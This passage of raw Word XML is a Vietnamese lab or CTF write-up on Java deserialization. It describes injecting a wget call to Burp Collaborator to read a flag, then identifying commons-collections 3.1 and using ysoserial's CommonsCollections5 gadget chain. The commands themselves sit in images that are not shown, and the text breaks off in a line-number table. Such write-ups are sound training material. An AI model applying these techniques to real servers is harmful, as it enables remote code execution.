        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00184ED1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>* Khai thác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2996C9D6" w14:textId="3BA81C74" w:rsidR="009D2055" w:rsidRPr="0041729F" w:rsidRDefault="00BA6AA2" w:rsidP="00BA6AA2">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Thực hiện tạo đối tượng client kiểu MyHTTPClient với giá trị host được gán là 8.8.8.8 cùng wget tới Burp Collaborator. Sau đó tạo đối tượng test </w:t>
      </w:r>
      <w:r w:rsidR="00E70B15">
        <w:t>kiểu TestConnection với giá trị client được gán vào rồi thực hiện in lên giao diện web:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC17F9E" w14:textId="190DA1DA" w:rsidR="000D2311" w:rsidRDefault="000D2311">
      <w:r w:rsidRPr="000D2311">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B06EBB5" wp14:editId="15AEDD19">
            <wp:extent cx="5731510" cy="1280160"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="9521159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15970" name="Picture 1" descr="A screen shot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1280160"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEFB5B8" w14:textId="70811A70" w:rsidR="005E055E" w:rsidRDefault="005E055E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Kết quả là thành công đọc được file flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AE9BBF" w14:textId="546C129F" w:rsidR="00DC604F" w:rsidRDefault="00DC604F">
      <w:r w:rsidRPr="00DC604F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="511335A7" wp14:editId="2B53E60D">
            <wp:extent cx="5731510" cy="1141095"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="8890765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76504" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1141095"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB8C924" w14:textId="77777777" w:rsidR="005E055E" w:rsidRDefault="005E055E"/>
    <w:p w14:paraId="6D2F4619" w14:textId="5F08625E" w:rsidR="005E055E" w:rsidRDefault="005E055E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6078742A" w14:textId="77F8E79C" w:rsidR="005E055E" w:rsidRDefault="005E055E" w:rsidP="005E055E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Mục tiêu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080D6307" w14:textId="7FFEAE15" w:rsidR="005E055E" w:rsidRDefault="005E055E" w:rsidP="00CE6229">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Ở bài này thì không có class nào khác giúp thực hiện tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00CE6229">
        <w:t xml:space="preserve"> vậy nên không có cách khai thác trực tiếp từ các class này được.</w:t>
      </w:r>
      <w:r w:rsidR="007275D8">
        <w:t xml:space="preserve"> Vì vậy mình sẽ kiểm tra thư viện của java trong </w:t>
      </w:r>
      <w:r w:rsidR="009F5714">
        <w:t>pom.</w:t>
      </w:r>
      <w:r w:rsidR="00711EBC">
        <w:t>xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB2912E" w14:textId="63B81B84" w:rsidR="00BB11DC" w:rsidRDefault="00711EBC">
      <w:r w:rsidRPr="00711EBC">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29047909" wp14:editId="09489887">
            <wp:extent cx="5731510" cy="3724910"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="8391270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7080" name="Picture 1" descr="A screen shot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3724910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A328C6" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>File pom.xml chứa các dependency chính sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185FF20C" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>commons-collections:commons-collections:3.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D58017" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>javax.servlet:javax.servlet-api:4.0.1 (scope provided)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209FC202" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>junit-jupiter (test scope)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE27D6D" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>Trong ngữ cảnh deserialization, commons-collections 3.1 là điểm đáng chú ý vì các phiên bản cũ của thư viện này thường được liệt vào danh sách các thư viện có gadget có thể bị lợi dụng trong chuỗi deserialization. Các dependency khác ở đây (servlet API, junit test) ít khả năng trực tiếp tạo gadget trong môi trường production nếu chỉ dùng đúng mục đích.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117F470D" w14:textId="72D8611B" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>Trong đó thư viện</w:t>
      </w:r>
      <w:r w:rsidRPr="00231EA9">
        <w:t xml:space="preserve"> Commons Collections 3.</w:t>
      </w:r>
      <w:r>
        <w:t>1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD581FB" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>Đây là một phiên bản cũ của thư viện Apache Commons Collections. Các phiên bản 3.x từng được biết đến trong các chuỗi gadget cho tấn công deserialization (mẫu chung: attacker tận dụng các lớp trong thư viện để tạo chuỗi đối tượng khi server deserialize).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE8663B" w14:textId="77777777" w:rsidR="00231EA9" w:rsidRPr="00231EA9" w:rsidRDefault="00231EA9" w:rsidP="00231EA9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00231EA9">
        <w:t>Nếu thư viện này có mặt trong classpath của ứng dụng, kẻ tấn công có thể tìm cách tận dụng các lớp/gadget có sẵn trong thư viện để kích hoạt hành vi không mong muốn khi server deserialize dữ liệu không tin cậy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2116BDDA" w14:textId="77777777" w:rsidR="00487DE2" w:rsidRDefault="00487DE2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="24940320" w14:textId="1F0BC1CE" w:rsidR="00711EBC" w:rsidRDefault="00274FBF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Để giải quyết bài lab này, mình sẽ sử dụng công cụ ysoserial:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76803CAB" w14:textId="36041B8C" w:rsidR="00274FBF" w:rsidRDefault="00FB4D3D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB4D3D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56A18C05" wp14:editId="38FF43EB">
            <wp:extent cx="5731510" cy="2321560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="134049837"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9837" name="Picture 1" descr="A white background with text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2321560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D79A8E" w14:textId="12CD9F74" w:rsidR="00AC5461" w:rsidRPr="00AC5461" w:rsidRDefault="00AC5461">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trong công</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cụ có mô tả</w:t>
      </w:r>
      <w:r w:rsidR="00F801CD">
        <w:t xml:space="preserve"> về các payload tương ứng với phiên bản:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CDBDCB" w14:textId="64D33AD4" w:rsidR="00DB1330" w:rsidRDefault="00DB1330">
      <w:r w:rsidRPr="00DB1330">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1684B3EE" wp14:editId="512CAFDE">
            <wp:extent cx="5731510" cy="1178560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="65556005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60059" name="Picture 1" descr="A computer screen shot of a computer code&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1178560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21665BA8" w14:textId="0283EA9C" w:rsidR="00F801CD" w:rsidRPr="00F801CD" w:rsidRDefault="00F801CD">
      <w:r>
        <w:t xml:space="preserve">Với phiên bản </w:t>
      </w:r>
      <w:r w:rsidR="00A76F7A">
        <w:t>common</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-collection 3.1 của bài </w:t>
      </w:r>
      <w:r w:rsidR="00A76F7A">
        <w:t xml:space="preserve">lab, mình sẽ có vài payload để sử dụng. Ở đây mình sẽ sử dụng CommomsCollections5 để tạo mã </w:t>
      </w:r>
      <w:r w:rsidR="00D87253">
        <w:t>serialize:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420F793A" w14:textId="6A0A6CD4" w:rsidR="00915B26" w:rsidRDefault="00915B26">
      <w:r w:rsidRPr="00915B26">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CFDDDB4" wp14:editId="52BD55CC">
            <wp:extent cx="5731510" cy="2350135"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="126005700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57003" name="Picture 1" descr="A screen shot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2350135"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EDA7D1" w14:textId="7E7B07AA" w:rsidR="00D87253" w:rsidRPr="00D87253" w:rsidRDefault="00D87253">
      <w:r>
        <w:t>Tiếp tục gửi mã và thành công lấy được flag của bài:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC6E66" w14:textId="50069355" w:rsidR="00EF0A30" w:rsidRDefault="00915B26">
      <w:r w:rsidRPr="00915B26">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="274F0463" wp14:editId="6B7E1CF5">
            <wp:extent cx="5731510" cy="1248410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="1227141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41701" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1248410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="462C6E63" w14:textId="758F4CC7" w:rsidR="00085728" w:rsidRPr="00085728" w:rsidRDefault="00085728">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Để hiểu rõ về payload này, mình sẽ xem cách mà nó hoạt động trong phần source code của công cụ:</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6A2A76" w:rsidRPr="006A2A76" w14:paraId="607C7BBA" w14:textId="77777777" w:rsidTr="004A429C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F11176" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B433247" w14:textId="77777777" w:rsidR="00D87253" w:rsidRPr="006A2A76" w:rsidRDefault="00D87253" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0537CA04" w14:textId="1BECA084" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="484DAF61" w14:textId="5FD6AFCF" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674DF15B" w14:textId="4A237975" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34311716" w14:textId="4DF74E80" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A4F7777" w14:textId="238B6BE7" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35A6ED38" w14:textId="36B749DF" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE740C7" w14:textId="3099B865" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45ACFE6A" w14:textId="1443C001" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18A90678" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2769FAE5" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27CAD9BE" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C100A7E" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6F4DA6" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F02DD42" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BEEDB81" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1567DC5A" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C7D1F2B" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7721907B" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DB0B30C" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ED1B0A5" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D728940" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0837E4" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C54DEED" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EF8ED50" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4EB4C6EA" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083FE956" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16E7320E" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E780433" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="00D87253">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="006A2A76">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D45EC73" w14:textId="77777777" w:rsidR="006A2A76" w:rsidRPr="006A2A76" w:rsidRDefault="006A2A76" w:rsidP="006A2A76">
            <w:pPr>
